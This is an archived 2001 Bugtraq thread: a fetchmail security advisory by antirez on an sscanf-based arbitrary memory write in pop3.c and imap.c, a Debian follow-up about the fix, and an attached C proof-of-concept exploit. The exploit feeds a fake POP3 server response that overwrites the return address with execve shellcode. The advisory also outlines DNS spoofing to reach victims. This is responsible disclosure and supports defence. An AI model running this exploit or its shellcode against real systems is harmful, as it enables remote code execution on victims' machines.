6878368 2001-08-10 00:03 +0200  /165 rader/ antirez <antirez@invece.org>
Sänt av: joel@lysator.liu.se
Importerad: 2001-08-10  02:33  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Externa svar till: antirez@invece.org
Mottagare: Bugtraq (import) <18691>
Ärende: Fetchmail security advisory
------------------------------------------------------------
Fetchmail advisory, copyright(C) 2001 Salvatore Sanfilippo
Distribution of this document is unlimited.

THE PROBLEM

In a security auditing I found two remotly explotiable
memory corruption problems. The bug, that is similar
in the file pop3.c and imap.c, allows an attacker to
'poke' arbitrary memory addresses with 32 bit data, so you
can write what you want in memory.

Protections like stackguard WITHOUT the xor-canary active
will not be effective against this problem.

To exploit the problem you need to impersonate the server,
so the attacker can be the server itself or, faking the
DNS resolver, some other attacker. See the last section
of this document about DNS forgery information.

IMPACT

The attacker can execute arbitrary code in your system,
both if fetchmail is running as user or as root.
If the attacker is able to fake your DNS resolver or
your DNS server it can take control of your system even
without to take control of one of your POP3/IMAP servers.

VERSION AFFECTED

Probably all the fetchmail versions prior (not including) 5.8.17.

THE CODE

This is the relevant portion of code affected:

pop3.c:

static int pop3_getsizes(int sock, int count, int *sizes)
[snip]
        while ((ok = gen_recv(sock, buf, sizeof(buf))) == 0)
        {
            int num, size;

            if (DOTLINE(buf))
                break;
            else if (sscanf(buf, "%d %d", &num, &size) == 2)
                sizes[num - 1] = size;
        }
[snip]

The problem is just the same in the file imap.c, see yourself.

As you can see you can pass two integers, num and size.
The first is your offset, the second the 32bit value you
want to write in the memory location.

You can provide negative and positive offsets (num) so you
can write both before and after the address of the 'sizes' pointer.

To write you should simulate the POP3 session, wainting for the LIST
command. Than issue a fake LIST response. The following is part of
the output of the exploit you can find attached:

+OK			(banner)
+OK			(user)
+OK			(password)
+OK 10 0		(stat)
+OK 0			(last)
+OK			(list)
-30 -1431655766		(first line of the list output)
-29 -1431655766		(second line ...)
[snip]
.

The 'sizes' buffer is stack allocated (with alloca()), and is the
number of messages in the STAT response * sizeof(int) so you can
request a piece of memory to put your shellcode, you can also put it
in some static buffer (try grep 'static char' *.c) to exploit in a
more portable way.

Note that alloca() used where you can get a big 'size' argument
isn't a big idea. You can also crash fetchmail just providing a
very big response to STAT.

THE FIX

Fetchmail should use %u %u instead of %d %d as scanf format string,
than do a sanity check about the message number the server provide
in the LIST response lines and in the STAT response.

DNS FORGERY

The exploit may be used without to take the control of the
POP/IMAP server if you are able to spoof a DNS packet with
the right destination port and query ID. This is quite hard
but not impossible, and it is strictly related to the resolver
library the victim is using.

DNS forgery against software like fetchmail will probably
be simpler than against other software since in daemon
mode fetchmail polls the mailbox with a fixed period, and
resolves the name every time it polls. You have a lot
of try.

As stated, this issue is related to the libc, not to fetchmail itself,
but a weak libc resolving rutine will help a lot the attacker.
In the case of glibc 2.x you should guess the following stuff:

pid, seconds, useconds, source port, query time, DNS server ip
address.  [with glibc, the ID is computed using something like (PID
xor USEC xor SEC)]

pid: you can try the whole pid space, or a subset assuming
fetchmail in daemon mode running with a pid in the range
1-500 or so.

seconds, useconds: you can use ICMP timestamp to syncronize, this
may reduce your 2^16 ID space a lot.

source port: I never tested this but maybe sending UDP packets
to different ports you may be able to guess high ports
that are open by the DNS resolver, to do this you need to
send this UDP packets spoofed from the victim DNS server
than try to see the IP ID sequence. It isn't trivial
but may work. Someone on the list known something of better?

query time: With fetchmail is quite simple, you can try to send
your fake DNS responses without to stop, waiting (hoping) for
a natural syncronization with the query time. This will only
work with fetchmail in daemon mode, and will work better
if the poll time is short. Of course the IP ID will help you
a lot of the host is in idle.

As you can guess, if you can't fake the DNS you can anyway exploit
fetchmail if you are on the server side, and your security
is the minium of the security of all your POP/IMAP servers.

AUTHOR STATUS AND FIX

The fetchmail author helped a lot fixing the issue ASAP.
This advisory was sent to bugtraq only after the fixed
version of fetchmail (5.8.17) was available at
http://www.tuxedo.org/~esr/fetchmail/

EXPLOIT

An example exploit is attached to this mail, it is poorly
written but should be enough to prove the fetchmail vulnerability.
You will probably need to joke with offsets to make it working
on your system.

NOTE

I tried to follow this policy in the release of this advisory:
http://www.wiretrip.net/rfp/policy.html

regards,
antirez

-- 
Salvatore Sanfilippo <antirez@invece.org>
http://www.kyuzz.org/antirez
finger antirez@tella.alicom.com for PGP key
28 52 F5 4A 49 65 34 29 - 1D 1B F6 DA 24 C7 12 BF
(6878368) /antirez <antirez@invece.org>/--(Ombruten)
Bilaga (text/plain) i text 6878369
Kommentar i text 6878510 av Matt Zimmerman <mdz@debian.org>
6878510 2001-08-09 20:40 -0400  /21 rader/ Matt Zimmerman <mdz@debian.org>
Sänt av: joel@lysator.liu.se
Importerad: 2001-08-10  04:25  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <18695>
Kommentar till text 6878368 av antirez <antirez@invece.org>
Ärende: Re: Fetchmail security advisory
------------------------------------------------------------
On Fri, Aug 10, 2001 at 12:03:41AM +0200, antirez wrote:

> VERSION AFFECTED
> 
> Probably all the fetchmail versions prior (not including) 5.8.17.

Note that Debian fetchmail 5.8.16-1 already includes the
suggested fix:

fetchmail (5.8.16-1) unstable; urgency=high
[...]
  * SECURITY FIX: fix remote exploit on pop3 and imap protocols; Thanks
    to Salvatore Sanfilippo <antirez@invece.org> for reporting the bug
    and suggesting a patch to fix it.

 -- Henrique de Moraes Holschuh <hmh@debian.org>  Sat, 14 Jul 2001
12:38:26 -030

-- 
 - mdz
(6878510) /Matt Zimmerman <mdz@debian.org>/(Ombruten)
Bilaga (application/pgp-signature) i text 6878511
6878511 2001-08-09 20:40 -0400  /10 rader/ Matt Zimmerman <mdz@debian.org>
Importerad: 2001-08-10  04:25  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <18696>
Bilaga (text/plain) till text 6878510
Ärende: Bilaga till: Re: Fetchmail security advisory
------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE7cy2YArxCt0PiXR4RAthRAJ9weTj/0SEyFFnsPveqHSzmtjTLRgCgpX8m
bHRl+MufqnJKuO3K1vaWCdo=
=EXN1
-----END PGP SIGNATURE-----
(6878511) /Matt Zimmerman <mdz@debian.org>/---------
6878369 2001-08-10 00:03 +0200  /57 rader/ antirez <antirez@invece.org>
Importerad: 2001-08-10  02:33  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Externa svar till: antirez@invece.org
Mottagare: Bugtraq (import) <18692>
Bilaga (text/plain) till text 6878368
Ärende: Bilaga till: Fetchmail security advisory
------------------------------------------------------------
/* fetchmail proof of concepts i386 exploit
 * Copyright (C) 2001 Salvatore Sanfilippo <antirez@invece.org>
 * Code under the GPL license.
 *
 * Usage: ./a.out | nc -l -p 3333
 * fetchmail localhost -P 3333 -p POP3
 *
 * This is a bad exploit with offset carefully selected
 * to work in my own system. It will probably not work in
 * your system if you don't modify RETR_OFFSET and SHELL_PTR,
 * but you may try to set the SHELL_PTR to 0xAAAAAAAA
 * and use gdb to obtain the proof that your fetchmail is vulnerable
 * without to exploit it.
 * Or just read the code in pop3.c.
 *
 * To improve the exploit portability you may put the shellcode inside
 * one of the static char buffers, grep 'static char' *.c.
 *
 * Tested on fetchmail 5.8.15 running on Linux 2.4.6
 *
 * On success you should see the ls output.
 */

#include <stdio.h>

#define MESSAGES 10
#define RETR_OFFSET -20
#define SHELL_PTR 0xbfffba94

int main(void)
{
	int ish = SHELL_PTR;
	int ret_offset = -10;
	char shellcode[] = /* take the shellcode multiple of 4 in size */
	"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
	"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
	"\x80\xe8\xdc\xff\xff\xff/bin/ls\0\0";
	int *sc = (int*) shellcode;
	int noop = 0x90909090;
	int i;

	/* +OK for user and password, than report the number of messages */
	printf("+OK\r\n+OK\r\n+OK\r\n+OK %d 0\r\n+OK 0\r\n+OK\r\n", MESSAGES);
	/* Overwrite the RET pointer */
	for (i = ret_offset-20; i < ret_offset+20; i++)
		printf("%d %d\r\n", i, ish);
	/* Put some NOP */
	for (i = 1; i < 21; i++)
		printf("%d %d\r\n", i, noop);
	/* Put the shell code in the buffer */
	for (i = 21; i < 21+(sizeof(shellcode)/4); i++)
		printf("%d %d\r\n", i, *sc++);
	printf(".\r\n"); /* POP data term */
	return 0;
}
(6878369) /antirez <antirez@invece.org>/------------
6878510 2001-08-09 20:40 -0400  /21 rader/ Matt Zimmerman <mdz@debian.org>
Sänt av: joel@lysator.liu.se
Importerad: 2001-08-10  04:25  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <18695>
Kommentar till text 6878368 av antirez <antirez@invece.org>
Ärende: Re: Fetchmail security advisory
------------------------------------------------------------
On Fri, Aug 10, 2001 at 12:03:41AM +0200, antirez wrote:

> VERSION AFFECTED
> 
> Probably all the fetchmail versions prior (not including) 5.8.17.

Note that Debian fetchmail 5.8.16-1 already includes the
suggested fix:

fetchmail (5.8.16-1) unstable; urgency=high
[...]
  * SECURITY FIX: fix remote exploit on pop3 and imap protocols; Thanks
    to Salvatore Sanfilippo <antirez@invece.org> for reporting the bug
    and suggesting a patch to fix it.

 -- Henrique de Moraes Holschuh <hmh@debian.org>  Sat, 14 Jul 2001
12:38:26 -030

-- 
 - mdz
(6878510) /Matt Zimmerman <mdz@debian.org>/(Ombruten)
Bilaga (application/pgp-signature) i text 6878511
6878511 2001-08-09 20:40 -0400  /10 rader/ Matt Zimmerman <mdz@debian.org>
Importerad: 2001-08-10  04:25  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <18696>
Bilaga (text/plain) till text 6878510
Ärende: Bilaga till: Re: Fetchmail security advisory
------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE7cy2YArxCt0PiXR4RAthRAJ9weTj/0SEyFFnsPveqHSzmtjTLRgCgpX8m
bHRl+MufqnJKuO3K1vaWCdo=
=EXN1
-----END PGP SIGNATURE-----
(6878511) /Matt Zimmerman <mdz@debian.org>/---------